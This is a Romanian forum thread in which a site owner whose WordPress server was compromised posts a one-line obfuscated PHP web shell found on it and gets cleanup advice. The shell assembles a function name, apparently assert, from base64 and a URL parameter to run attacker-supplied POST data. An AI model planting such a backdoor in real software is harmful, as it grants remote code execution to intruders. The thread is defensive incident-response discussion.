Am gasit asta pe server, cine trebuei sa remedieze? Firma de hosting sau ?Cod PHP:<?php $c=base64_decode('YXNzZXI=').$_GET['n'].'t';@$c($_POST['fyt']);?>abcabcabc
Versiune printabilă
Am gasit asta pe server, cine trebuei sa remedieze? Firma de hosting sau ?Cod PHP:<?php $c=base64_decode('YXNzZXI=').$_GET['n'].'t';@$c($_POST['fyt']);?>abcabcabc
Nu cred ca e treaba firmei de hosting... Un cod base64 nu trebuie neaparat "remediat". Cred ca trebuie vazut ce e cu el, unde e si ce face, deci ai nevoie de un programator caruia sa ii dai full acces la fisierele tale pentru a putea urmari codul.
Azi a avut loc "aracul", un intreg server e infestat, de cand am scris mesajul deja lurceaza, modifica fisierele index.php ... tema e cumparat, wordpress curat... na .. ce sa zic?
In cazul asta pot rezolva cei de la hosting cu un backup total rapid.
Am aflat si de unde e buba: hacked by megla akash from Team_CC
Interesant este ca au facut si sitemap .. atacul pare a fi incepand cu ora 1:10 cu modificarea robots.txt Sitemap: http://site.info/sitemap.xml ...
Intrebare: daca sterg doar wordpress.-ul si pastrez baza de dare care ar fi sansele sa scap?
Poti incerca reinstalare wp, tema, module, etc. Dar cum ai zis si tu... iti ia o gramada de timp.
Daca a putut intra inseamna ca undeva ai avut o vulnerabilitate (instalare wp, tema, module). Daca e afectata si baza de date poti rezolva daca ai un backup dar e recomandat sa schimbi atat numemele bazei de date precum si prefixele tabelelor si toate parolele.
Cred ca peste 80%
Suna-i pe cei de la gazduire, da cumva de ei.... Modificarile de care ti-am zis au doar rolul de a-l impiedica sa intre din nou accesand aceeasi vulnerabilitate. Daca a injectat ceva in db cureti de-ti vine rau....